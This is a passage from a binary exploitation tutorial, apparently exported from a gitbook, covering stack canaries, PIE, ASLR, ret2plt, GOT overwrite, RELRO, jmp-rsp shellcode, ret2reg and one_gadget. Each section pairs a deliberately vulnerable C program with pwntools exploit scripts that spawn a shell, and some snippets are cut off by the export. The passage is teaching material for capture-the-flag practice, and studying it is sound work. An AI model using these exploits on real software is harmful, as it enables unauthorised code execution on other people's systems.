The offset in this case is 7 because the 7th %p read the buffer; the location is
where you want to write it and the value is what. Note that you can add as many
location-value pairs into the dictionary as you want.
You can also grab the location of the auth symbol with pwntools:
elf = ELF('./auth')
AUTH = elf.sym['auth']
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 56/240
4/10/24, 12:28 PM Binary Exploitation
Stack Canaries
The Buffer Overflow defence
Stack Canaries are very simple - at the beginning of the function, a random value is
placed on the stack. Before the program executes ret , the current value of that
variable is compared to the initial: if they are the same, no buffer overflow has
occurred.
If they are not, the attacker attempted to overflow to control the return pointer and
the program crashes, often with a ***stack smashing detected*** error message.
On Linux, stack canaries end in 00 . This is so that they null-terminate any strings in case
you make a mistake when using print functions, but it also makes them much easier to
spot.
Bypassing Canaries
There are two ways to bypass a canary.
Leaking it
This is quite broad and will differ from binary to binary, but the main aim is to read the
value. The simplest option is using format string if it is present - the canary, like other
local variables, is on the stack, so if we can leak values off the stack it's easy.
Source
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 57/240
4/10/24, 12:28 PM Binary Exploitation
#include <stdio.h>
void vuln() {
char buffer[64];
puts("Leak me");
gets(buffer);
printf(buffer);
puts("");
puts("Overflow me");
gets(buffer);
}
int main() {
vuln();
}
void win() {
puts("You won!");
}
The source is very simple - it gives you a format string vulnerability, then a buffer
overflow vulnerability. The format string we can use to leak the canary value, then we
can use that value to overwrite the canary with itself. This way, we can overflow past
the canary but not trigger the check as its value remains constant. And of course, we
just have to run win() .
32-bit
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 58/240
4/10/24, 12:28 PM Binary Exploitation
Yup, there is. Now we need to calculate at what offset the canary is at, and to do this
we'll use radare2.
$ r2 -d -A vuln-32
[0xf7f2e0b0]> db 0x080491d7
[0xf7f2e0b0]> dc
Leak me
%p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
0xffd7cd60 0xffd7cd7c 0xffd7cdec 0x00000002 0x0804919e |...............
0xffd7cd70 0x08048034 0x00000000 0xf7f57000 0x00007025 4........p..%p..
0xffd7cd80 0x00000000 0x00000000 0x08048034 0xf7f02a28 ........4...(*..
0xffd7cd90 0xf7f01000 0xf7f3e080 0x00000000 0xf7d53ade .............:..
0xffd7cda0 0xf7f013fc 0xffffffff 0x00000000 0x080492cb ................
0xffd7cdb0 0x00000001 0xffd7ce84 0xffd7ce8c 0xadc70e00 ................
The last value there is the canary. We can tell because it's roughly 64 bytes after the
"buffer start", which should be close to the end of the buffer. Additionally, it ends in
00 and looks very random, unlike the libc and stack addresses that start with f7 and
ff . If we count the number of address it's around 24 until that value, so we go one
before and one after as well to make sure.
$./vuln-32
Leak me
%23$p %24$p %25$p
0xa4a50300 0xf7fae080 (nil)
It appears to be at %23$p . Remember, stack canaries are randomised for each new
process, so it won't be the same.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 59/240
4/10/24, 12:28 PM Binary Exploitation
p = process('./vuln-32')
log.info(p.clean())
p.sendline('%23$p')
$ python3 exploit.py
[+] Starting local process './vuln-32': pid 14019
[*] b'Leak me\n'
[+] Canary: 0xcc987300
Now all that's left is work out what the offset is until the canary, and then the offset
from after the canary to the return pointer.
$ r2 -d -A vuln-32
[0xf7fbb0b0]> db 0x080491d7
[0xf7fbb0b0]> dc
Leak me
%23$p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
[...]
0xffea8af0 0x00000001 0xffea8bc4 0xffea8bcc 0xe1f91c00
We see the canary is at 0xffea8afc . A little later on the return pointer (we assume) is
at 0xffea8b0c . Let's break just after the next gets() and check what value we
overwrite it with (we'll use a De Bruijn pattern).
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 60/240
4/10/24, 12:28 PM Binary Exploitation
[0x080491d7]> db 0x0804920f
[0x080491d7]> dc
0xe1f91c00
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYA
hit breakpoint at: 804920f
[0x0804920f]> pxw @ 0xffea8afc
0xffea8afc 0x41574141 0x41415841 0x5a414159 0x41614141 AAWAAXAAYAAZAAaA
0xffea8b0c 0x41416241 0x64414163 0x41654141 0x41416641 AbAAcAAdAAeAAfAA
Return pointer is 16 bytes after the canary start, so 12 bytes after the canary.
p = process('./vuln-32')
log.info(p.clean())
p.sendline('%23$p')
payload = b'A' * 64
payload += p32(canary) # overwrite canary with original value to not tri
payload += b'A' * 12 # pad to return pointer
payload += p32(0x08049245)
p.clean()
p.sendline(payload)
print(p.clean().decode('latin-1'))
64-bit
Same source, same approach, just 64-bit. Try it yourself before checking the solution.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 61/240
4/10/24, 12:28 PM Binary Exploitation
Remember, in 64-bit format string goes to the relevant registers first and the addresses
can fit 8 bytes each so the offset may be different.
This is possible on 32-bit, and sometimes unavoidable. It's not, however, feasible on 64-
bit.
As you can expect, the general idea is to run the process loads and load of times with
random canary values until you get a hit, which you can differentiate by the presence of
a known plaintext, e.g. flag{ and this can take ages to run and is frankly not a
particularly interesting challenge.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 62/240
4/10/24, 12:28 PM Binary Exploitation
PIE
Position Independent Code
Overview
PIE stands for Position Independent Executable, which means that every time you run
the file it gets loaded into a different memory address. This means you cannot
hardcode values such as function addresses and gadget locations without finding out
where they are.
Analysis
Luckily, this does not mean it's impossible to exploit. PIE executables are based around
relative rather than absolute addresses, meaning that while the locations in memory
are fairly random the offsets between different parts of the binary remain constant.
For example, if you know that the function main is located 0x128 bytes in memory
after the base address of the binary, and you somehow find the location of main , you
can simply subtract 0x128 from this to get the base address and from the addresses
of everything else.
Exploitation
So, all we need to do is find a single address and PIE is bypassed. Where could we leak
this address from?
We know that the return pointer is located on the stack - and much like a canary, we
can use format string (or other ways) to read the value off the stack. The value will
always be a static offset away from the binary base, enabling us to completely bypass
PIE!
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 63/240
4/10/24, 12:28 PM Binary Exploitation
Double-Checking
Due to the way PIE randomisation works, the base address of a PIE executable will
always end in the hexadecimal characters 000 . This is because pages are the things
being randomised in memory, which have a standard size of 0x1000 . Operating
Systems keep track of page tables which point to each section of memory and define
the permissions for each section, similar to segmentation.
Checking the base address ends in 000 should probably be the first thing you do if
your exploit is not working as you expected.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 64/240
4/10/24, 12:28 PM Binary Exploitation
Not to mention that the ROP capabilities are incredibly powerful as well.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 65/240
4/10/24, 12:28 PM Binary Exploitation
The Source
#include <stdio.h>
int main() {
vuln();
return 0;
}
void vuln() {
char buffer[20];
gets(buffer);
}
void win() {
puts("PIE bypassed! Great job :D");
}
Pretty simple - we print the address of main , which we can read and calculate the base
address from. Then, using this, we can calculate the address of win() itself.
Analysis
Let's just run the script to make sure it's the right one :D
$ ./vuln-32
Main Function is at: 0x5655d1b9
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 66/240
4/10/24, 12:28 PM Binary Exploitation
Exploitation
First, let's set up the script. We create an ELF object, which becomes very useful later
on, and start the process.
Now we want to take in the main function location. To do this we can simply receive
up until it (and do nothing with that) and then read it.
p.recvuntil('at: ')
main = int(p.recvline(), 16)
Since we received the entire line except for the address, only the address will come up
with p.recvline() .
Now we'll use the ELF object we created earlier and set its base address. The sym
dictionary returns the offsets of the functions from binary base until the base address
is set, after which it returns the absolute address in memory.
In this case, elf.sym['main'] will return 0x11b9 ; if we ran it again, it would return
0x11b9 + the base address. So, essentially, we're subtracting the offset of main from
the address we leaked to get the base of the binary.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 67/240
4/10/24, 12:28 PM Binary Exploitation
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.sendline(payload)
print(p.clean().decode('latin-1'))
By this point, I assume you know how to find the padding length and other stuff we've
been mentioning for a while, so I won't be showing you every step of that.
[*] 'vuln-32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process 'vuln-32': pid 4617
PIE bypassed! Great job :D
Awesome!
Final Exploit
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 68/240
4/10/24, 12:28 PM Binary Exploitation
p.recvuntil('at: ')
main = int(p.recvline(), 16)
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.sendline(payload)
print(p.clean().decode('latin-1'))
Summary
From the leak address of main , we were able to calculate the base address of the
binary. From this we could then calculate the address of win and call it.
And one thing I would like to point out is how simple this exploit is. Look - it's 10 lines of
code, at least half of which is scaffolding and setup.
64-bit
Try this for yourself first, then feel free to check the solution. Same source, same
challenge.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 69/240
4/10/24, 12:28 PM Binary Exploitation
PIE Bypass
Using format string
The Source
#include <stdio.h>
void vuln() {
char buffer[20];
gets(buffer);
}
int main() {
vuln();
return 0;
}
void win() {
puts("PIE bypassed! Great job :D");
}
Unlike last time, we don't get given a function. We'll have to leak it with format strings.
Analysis
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 70/240
4/10/24, 12:28 PM Binary Exploitation
$ ./vuln-32
Everything's as we expect.
Exploitation
Setup
PIE Leak
$ ./vuln-32
What's your name?
%p %p %p %p %p
Nice to meet you 0xf7eee080 (nil) 0x565d31d5 0xf7eb13fc 0x1
3rd one looks like a binary address, let's check the difference between the 3rd leak and
the base address in radare2. Set a breakpoint somewhere after the format string leak
(doesn't really matter where).
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 71/240
4/10/24, 12:28 PM Binary Exploitation
$ r2 -d -A vuln-32
We can see the base address is 0x565ef000 and the leaked value is 0x565f01d5 .
Therefore, subtracting 0x1d5 from the leaked address should give us the binary. Let's
leak the value and get the base address.
p.recvuntil('name?\n')
p.sendline('%3$p')
p.recvuntil('you ')
elf_leak = int(p.recvline(), 16)
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.recvuntil('message?\n')
p.sendline(payload)
print(p.clean().decode())
Final Exploit
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 72/240
4/10/24, 12:28 PM Binary Exploitation
p.recvuntil('name?\n')
p.sendline('%3$p')
p.recvuntil('you ')
elf_leak = int(p.recvline(), 16)
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.recvuntil('message?\n')
p.sendline(payload)
print(p.clean().decode())
64-bit
Same deal, just 64-bit. Try it out :)
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 73/240
4/10/24, 12:28 PM Binary Exploitation
ASLR
Address Space Layout Randomisation
Overview
ASLR stands for Address Space Layout Randomisation and can, in most cases, be
thought of as libc 's equivalent of PIE - every time you run a binary, libc (and other
libraries) get loaded into a different memory address.
While it's tempting to think of ASLR as libc PIE, there is a key difference.
ASLR is a kernel protection while PIE is a binary protection. The main difference is that
PIE can be compiled into the binary while the presence of ASLR is completely
dependant on the environment running the binary. If I sent you a binary compiled with
ASLR disabled while I did it, it wouldn't make any different at all if you had ASLR enabled.
Of course, as with PIE, this means you cannot hardcode values such as function address
(e.g. system for a ret2libc).
When functions finish execution, they do not get removed from memory; instead, they
just get ignored and overwritten. Chances are very high that you will grab one of these
remnants with the format string. Different libc versions can act very differently during
execution, so a value you just grabbed may not even exist remotely, and if it does the
offset will most likely be different (different libcs have different sizes and therefore
different offsets between functions). It's possible to get lucky, but you shouldn't really
hope that the offsets remain the same.
Instead, a more reliable way is reading the GOT entry of a specific function.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 74/240
4/10/24, 12:28 PM Binary Exploitation
Double-Checking
For the same reason as PIE, libc base addresses always end in the hexadecimal
characters 000 .
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 75/240
4/10/24, 12:28 PM Binary Exploitation
The Source
#include <stdio.h>
#include <stdlib.h>
void vuln() {
char buffer[20];
gets(buffer);
}
int main() {
vuln();
return 0;
}
void win() {
puts("PIE bypassed! Great job :D");
}
Just as we did for PIE, except this time we print the address of system.
Analysis
$ ./vuln-32
System is at: 0xf7de5f00
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 76/240
4/10/24, 12:28 PM Binary Exploitation
Your address of system might end in different characters - you just have a different libc
version
Exploitation
Much of this is as we did with PIE.
Note that we include the libc here - this is just another ELF object that makes our lives
easier.
Parse the address of system and calculate libc base from that (as we did with PIE):
p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)
Now we can finally ret2libc, using the libc ELF object to really simplify it for us:
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
p.interactive()
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 77/240
4/10/24, 12:28 PM Binary Exploitation
Final Exploit
p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
p.interactive()
64-bit
Try it yourself :)
Using pwntools
If you prefer, you could have changed the following payload to be more pwntoolsy:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 78/240
4/10/24, 12:28 PM Binary Exploitation
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
binsh = next(libc.search(b'/bin/sh'))
rop = ROP(libc)
rop.raw('A' * 32)
rop.system(binsh)
p.sendline(rop.chain())
The benefit of this is it's (arguably) more readable, but also makes it much easier to
reuse in 64-bit exploits as all the parameters are automatically resolved for you.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 79/240
4/10/24, 12:28 PM Binary Exploitation
The PLT and GOT are sections within an ELF file that deal with a large portion of the
dynamic linking. Dynamically linked binaries are more common than statically linked
binary in CTFs. The purpose of dynamic linking is that binaries do not have to carry all
the code necessary to run within them - this reduces their size substantially. Instead,
they rely on system libraries (especially libc , the C standard library) to provide the
bulk of the fucntionality.
For example, each ELF file will not carry their own version of puts compiled within it -
it will instead dynamically link to the puts of the system it is on. As well as smaller
binary sizes, this also means the user can continually upgrade their libraries, instead of
having to redownload all the binaries every time a new version comes out.
So when it's on a new system, it replaces function calls with hardcoded addresses?
Not quite.
The problem with this approach is it requires libc to have a constant base address,
i.e. be loaded in the same area of memory every time it's run, but remember that ASLR
exists. Hence the need for dynamic linking. Due to the way ASLR works, these
addresses need to be resolved every time the binary is run. Enter the PLT and GOT.
When you call puts() in C and compile it as an ELF executable, it is not actually
puts() - instead, it gets compiled as puts@plt . Check it out in GDB:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 80/240
4/10/24, 12:28 PM Binary Exploitation
Well, as we said, it doesn't know where puts actually is - so it jumps to the PLT entry
of puts instead. From here, puts@plt does some very specific things:
If there is a GOT entry for puts , it jumps to the address stored there.
If there isn't a GOT entry, it will resolve it and jump there.
The GOT is a massive table of addresses; these addresses are the actual locations in
memory of the libc functions. puts@got , for example, will contain the address of
puts in memory. When the PLT gets called, it reads the GOT address and redirects
execution there. If the address is empty, it coordinates with the ld.so (also called the
dynamic linker/loader) to get the function address and stores it in the GOT.
Calling the PLT address of a function is equivalent to calling the function itself
The GOT address contains addresses of functions in libc , and the GOT is within the
binary.
The use of the first point is clear - if we have a PLT entry for a desirable libc function,
for example system , we can just redirect execution to its PLT entry and it will be the
equivalent of calling system directly; no need to jump into libc .
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 81/240
4/10/24, 12:28 PM Binary Exploitation
The second point is less obvious, but debatably even more important. As the GOT is
part of the binary, it will always be a constant offset away from the base. Therefore, if
PIE is disabled or you somehow leak the binary base, you know the exact address that
contains a libc function's address. If you perhaps have an arbitrary read, it's trivial to
leak the real address of the libc function and therefore bypass ASLR.
ret2plt
A ret2plt is a common technique that involves calling puts@plt and passing the GOT
entry of puts as a parameter. This causes puts to print out its own address in libc .
You then set the return address to the function you are exploiting in order to call it
again and enable you to
# 32-bit ret2plt
payload = flat(
b'A' * padding,
elf.plt['puts'],
elf.symbols['main'],
elf.got['puts']
)
# 64-bit
payload = flat(
b'A' * padding,
POP_RDI,
elf.got['puts']
elf.plt['puts'],
elf.symbols['main']
)
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 82/240
4/10/24, 12:28 PM Binary Exploitation
flat() packs all the values you give it with p32() and p64() (depending on context)
and concatenates them, meaning you don't have to write the packing functions out all the
time
%s format string
This has the same general theory but is useful when you have limited stack space or a
ROP chain would alter the stack in such a way to complicate future payloads, for
example when stack pivoting.
# this part is only relevant if you need to call the function again
# Send it off...
Summary
The PLT and GOT do the bulk of static linking
The PLT resolves actual locations in libc of functions you use and stores them in
the GOT
Next time that function is called, it jumps to the GOT and resumes execution
there
Calling function@plt is equivalent to calling the function itself
An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating
libc base
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 83/240
4/10/24, 12:28 PM Binary Exploitation
Overview
This time around, there's no leak. You'll have to use the ret2plt technique explained
previously. Feel free to have a go before looking further on.
#include <stdio.h>
void vuln() {
puts("Come get me");
char buffer[20];
gets(buffer);
}
int main() {
vuln();
return 0;
}
Analysis
We're going to have to leak ASLR base somehow, and the only logical way is a ret2plt.
We're not struggling for space as gets() takes in as much data as we want.
Exploitation
All the basic setup
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 84/240
4/10/24, 12:28 PM Binary Exploitation
Now we want to send a payload that leaks the real address of puts . As mentioned
before, calling the PLT entry of a function is the same as calling the function itself; if we
point the parameter to the GOT entry, it'll print out it's actual location. This is because
in C string arguments for functions actually take a pointer to where the string can be
found, so pointing it to the GOT entry (which we know the location of) will print it out.
payload = flat(
'A' * 32,
elf.plt['puts'],
elf.sym['main'],
elf.got['puts']
)
But why is there a main there? Well, if we set the return address to random jargon,
we'll leak libc base but then it'll crash; if we call main again, however, we essentially
restart the binary - except we now know libc base so this time around we can do a
ret2libc.
p.sendline(payload)
puts_leak = u32(p.recv(4))
p.recvlines(2)
Remember that the GOT entry won't be the only thing printed - puts , and most
functions in C, print until a null byte. This means it will keep on printing GOT
addresses, but the only one we care about is the first one, so we grab the first 4 bytes
and use u32() to interpret them as a little-endian number. After that we ignore the
the rest of the values as well as the Come get me from calling main again.
From here, we simply calculate libc base again and perform a basic ret2libc:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 85/240
4/10/24, 12:28 PM Binary Exploitation
payload = flat(
'A' * 32,
libc.sym['system'],
libc.sym['exit'], # exit is not required here, it's just n
next(libc.search(b'/bin/sh\x00'))
)
p.sendline(payload)
p.interactive()
Final Exploit
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 86/240
4/10/24, 12:28 PM Binary Exploitation
p.recvline()
payload = flat(
'A' * 32,
elf.plt['puts'],
elf.sym['main'],
elf.got['puts']
)
p.sendline(payload)
puts_leak = u32(p.recv(4))
p.recvlines(2)
payload = flat(
'A' * 32,
libc.sym['system'],
libc.sym['exit'],
next(libc.search(b'/bin/sh\x00'))
)
p.sendline(payload)
p.interactive()
64-bit
You know the drill - try the same thing for 64-bit. If you want, you can use pwntools'
ROP capabilities - or, to make sure you understand calling conventions, be daring and
do both :P
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 87/240
4/10/24, 12:28 PM Binary Exploitation
GOT Overwrite
Hijacking functions
You may remember that the GOT stores the actual locations in libc of functions.
Well, if we could overwrite an entry, we could gain code execution that way. Imagine
the following code:
char buffer[20];
gets(buffer);
printf(buffer);
Not only is there a buffer overflow and format string vulnerability here, but say we
used that format string to overwrite the GOT entry of printf with the location of
system . The code would essentially look like the following:
char buffer[20];
gets(buffer);
system(buffer);
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 88/240
4/10/24, 12:28 PM Binary Exploitation
Source
#include <stdio.h>
void vuln() {
char buffer[300];
while(1) {
fgets(buffer, sizeof(buffer), stdin);
printf(buffer);
puts("");
}
}
int main() {
vuln();
return 0;
}
Infinite loop which takes in your input and prints it out to you using printf - no buffer
overflow, just format string. Let's assume ASLR is disabled - have a go yourself :)
Exploitation
As per usual, set it all up
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 89/240
4/10/24, 12:28 PM Binary Exploitation
p = process()
Now, to do the %n overwrite, we need to find the offset until we start reading the
buffer.
$ ./got_overwrite
%p %p %p %p %p %p
0x12c 0xf7fa7580 0x8049191 0x340 0x25207025 0x70252070
$./got_overwrite
%5$p
0x70243525
Yes it is!
p.clean()
p.interactive()
Now, next time printf gets called on your input it'll actually be system !
If the buffer is restrictive, you can always send /bin/sh to get you into a shell and run
longer commands.
Final Exploit
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 90/240
4/10/24, 12:28 PM Binary Exploitation
p = process()
p.clean()
p.sendline('/bin/sh')
p.interactive()
64-bit
You'll never guess. That's right! You can do this one by yourself.
ASLR Enabled
If you want an additional challenge, re-enable ASLR and do the 32-bit and 64-bit
exploits again; you'll have to leverage what we've covered previously.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 91/240
4/10/24, 12:28 PM Binary Exploitation
RELRO
Relocation Read-Only
RELRO is a protection to stop any GOT overwrites from taking place, and it does so very
effectively. There are two types of RELRO, which are both easy to understand.
Partial RELRO
Partial RELRO simply moves the GOT above the program's variables, meaning you can't
overflow into the GOT. This, of course, does not prevent format string overwrites.
Full RELRO
Full RELRO makes the GOT completely read-only, so even format string exploits cannot
overwrite it. This is not the default in binaries due to the fact that it can make it take
much longer to load as it need to resolve all the function addresses at once.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 92/240
4/10/24, 12:28 PM Binary Exploitation
Reliable Shellcode
Shellcode, but without the guesswork
Utilising ROP
The problem with shellcode exploits as they are is that the locations of it are
questionable - wouldn't it be cool if we could control where we wrote it to?
Well, we can.
Instead of writing shellcode directly, we can instead use some ROP to take in input
again - except this time, we specify the location as somewhere we control.
Using ESP
If you think about it, once the return pointer is popped off the stack ESP will points at
whatever is after it in memory - after all, that's the entire basis of ROP. But what if we
put shellcode there?
It's a crazy idea. But remember, ESP will point there. So what if we overwrite the return
pointer with a jmp esp gadget! Once it gets popped off, ESP will point at the
shellcode and thanks to the jmp esp it will be executed!
ret2reg
ret2reg extends the use of jmp esp to the use of any register that happens to point
somewhere you need it to.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 93/240
4/10/24, 12:28 PM Binary Exploitation
Source
#include <stdio.h>
void vuln() {
char buffer[20];
gets(buffer);
}
int main() {
vuln();
return 0;
}
Exploitation
Let's get all the basic setup done.
Now we're going to do something interesting - we are going to call gets again. Most
importantly, we will tell gets to write the data it receives to a section of the binary.
We need somewhere both readable and writeable, so I choose the GOT. We pass a GOT
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 94/240
4/10/24, 12:28 PM Binary Exploitation
entry to gets , and when it receives the shellcode we send it will write the shellcode
into the GOT. Now we know exactly where the shellcode is. To top it all off, we set the
return address of our call to gets to where we wrote the shellcode, perfectly
executing what we just inputted.
rop = ROP(elf)
rop.raw('A' * 32)
rop.gets(elf.got['puts']) # Call gets, writing to the GOT entry of p
rop.raw(elf.got['puts']) # now our shellcode is written there, we c
p.recvline()
p.sendline(rop.chain())
p.sendline(asm(shellcraft.sh()))
p.interactive()
Final Exploit
rop = ROP(elf)
rop.raw('A' * 32)
rop.gets(elf.got['puts']) # Call gets, writing to the GOT entry of p
rop.raw(elf.got['puts']) # now our shellcode is written there, we c
p.recvline()
p.sendline(rop.chain())
p.sendline(asm(shellcraft.sh()))
p.interactive()
64-bit
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 95/240
4/10/24, 12:28 PM Binary Exploitation
ASLR
No need to worry about ASLR! Neither the stack nor libc is used, save for the ROP.
The real problem would be if PIE was enabled, as then you couldn't call gets as the
location of the PLT would be unknown without a leak - same problem with writing to
the GOT.
Potential Problems
Thank to clubby789 and Faith from the HackTheBox Discord server, I found out that
the GOT often has Executable permissions simply because that's the default
permissions when there's no NX. If you have a more recent kernel, such as 5.9.0 , the
default is changed and the GOT will not have X permissions.
As such, if your exploit is failing, run uname -r to grab the kernel version and check if
it's 5.9.0 ; if it is, you'll have to find another RWX region to place your shellcode (if it
exists!).
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 96/240
4/10/24, 12:28 PM Binary Exploitation
Using RSP
Source
#include <stdio.h>
int test = 0;
int main() {
char input[100];
if(test) {
asm("jmp *%rsp");
return 0;
}
else {
return 0;
}
}
You can ignore most of it as it's mostly there to accomodate the existence of jmp rsp
- we don't actually want it called, so there's a negative if statement.
The chance of jmp esp gadgets existing in the binary are incredible low, but what you
often do instead is find a sequence of bytes that code for jmp rsp and jump there -
jmp rsp is \xff\xe4 in shellcode, so if there's is any part of the executable section with
bytes in this order, they can be used as if they are a jmp rsp .
Exploitation
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 97/240
4/10/24, 12:28 PM Binary Exploitation
Try to do this yourself first, using the explanation on the previous page. Remember,
RSP points at the thing after the return pointer once ret has occured, so your
shellcode goes after it.
Solution
payload = flat(
'A' * 120, # padding
jmp_rsp, # RSP will be pointing to shellcode, so we j
asm(shellcraft.sh()) # place the shellcode
)
p.sendlineafter('RSP!\n', payload)
p.interactive()
Limited Space
You won't always have enough overflow - perhaps you'll only have 7 or 8 bytes. What
you can do in this scenario is make the shellcode after the RIP equivalent to something
like
Where 0x20 is the offset between the current value of RSP and the start of the buffer.
In the buffer itself, we put the main shellcode. Let's try that!
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 98/240
4/10/24, 12:28 PM Binary Exploitation
pause()
p.sendlineafter('RSP!\n', payload)
p.interactive()
The 10 is just a placeholder. Once we hit the pause() , we attach with radare2 and
set a breakpoint on the ret , then continue. Once we hit it, we find the beginning of
the A string and work out the offset between that and the current value of RSP - it's
128 !
Solution
payload = asm(shellcraft.sh())
payload = payload.ljust(120, b'A')
payload += p64(jmp_rsp)
payload += asm('''
sub rsp, 128;
jmp rsp;
''') # 128 we found with r2
p.sendlineafter('RSP!\n', payload)
p.interactive()
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 99/240
4/10/24, 12:28 PM Binary Exploitation
We successfully pivoted back to our shellcode - and because all our addresses are
relative, it's completely reliable! ASLR beaten with pure shellcode.
This is harder with PIE as the location of jmp rsp will change, so you might have to leak
PIE base!
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 100/240
4/10/24, 12:28 PM Binary Exploitation
ret2reg
Using Registers to bypass ASLR
The reason RAX is the most common for this technique is that, by convention, the
return value of a function is stored in RAX. For example, take the following basic code:
#include <stdio.h>
int test() {
return 0xdeadbeef;
}
int main() {
test();
return 0;
}
As you can see, the value 0xdeadbeef is being moved into EAX.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 101/240
4/10/24, 12:28 PM Binary Exploitation
Using ret2reg
Source
Any function that returns a pointer to the string once it acts on it is a prime target.
There are many that do this, including stuff like gets() , strcpy() and fgets() .
We''l keep it simple and use gets() as an example.
#include <stdio.h>
void vuln() {
char buffer[100];
gets(buffer);
}
int main() {
vuln();
return 0;
}
Analysis
First, let's make sure that some register does point to the buffer:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 102/240
4/10/24, 12:28 PM Binary Exploitation
$ r2 -d -A vuln
Now we'll set a breakpoint on the ret in vuln() , continue and enter text .
[0x7f8ac76fa090]> db 0x0040113d
[0x7f8ac76fa090]> dc
hello
hit breakpoint at: 40113d
We've hit the breakpoint, let's check if RAX points to our register. We'll assume RAX
first because that's the traditional register to use for the return value.
[0x0040113d]> dr rax
0x7ffd419895c0
[0x0040113d]> ps @ 0x7ffd419895c0
hello
Exploitation
We now just need a jmp rax gadget or equivalent. I'll use ROPgadget for this and look
for either jmp rax or call rax :
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 103/240
4/10/24, 12:28 PM Binary Exploitation
There's a jmp rax at 0x40109c , so I'll use that. The padding up until RIP is 120 ; I
assume you can calculate this yourselves by now, so I won't bother showing it.
JMP_RAX = 0x40109c
p.sendline(payload)
p.interactive()
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 104/240
4/10/24, 12:28 PM Binary Exploitation
Awesome!
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 105/240
4/10/24, 12:28 PM Binary Exploitation
The value of this variable is a pointer to the function that malloc uses whenever it
is called.
To summarise, when you call malloc() the function __malloc_hook points to also
gets called - so if we can overwrite this with, say, a one_gadget , and somehow trigger
a call to malloc() , we can get an easy shell.
Finding One_Gadgets
Luckily there is a tool written in Ruby called one_gadget . To install it, run:
one_gadget libc
For most one_gadgets, certain criteria have to be met. This means they won't all work - in
fact, none of them may work.
Triggering malloc()
Wait a sec - isn't malloc() a heap function? How will we use it on the stack? Well, you
can actually trigger malloc by calling printf("%10000$c") (this allocates too many
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 106/240
4/10/24, 12:28 PM Binary Exploitation
bytes for the stack, forcing libc to allocate the space on the heap instead). So, if you
have a format string vulnerability, calling malloc is trivial.
Practise
This is a hard technique to give you practise on, due to the fact that your libc version
may not even have working one_gadgets . As such, feel free to play around with the
GOT overwrite binary and see if you can get a one_gadget working.
Remember, the value given by the one_gadget tool needs to be added to libc base as
it's just an offset.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 107/240
4/10/24, 12:28 PM Binary Exploitation
Syscalls
Interfacing directly with the kernel
Overview
A syscall is a system call, and is how the program enters the kernel in order to carry
out specific tasks such as creating processes, I/O and any others they would require
kernel-level access.
Browsing the list of syscalls, you may notice that certain syscalls are similar to libc
functions such as open() , fork() or read() ; this is because these functions are
simply wrappers around the syscalls, making it much easier for the programmer.
Triggering Syscalls
On Linux, a syscall is triggered by the int80 instruction. Once it's called, the kernel
checks the value stored in RAX - this is the syscall number, which defines what syscall
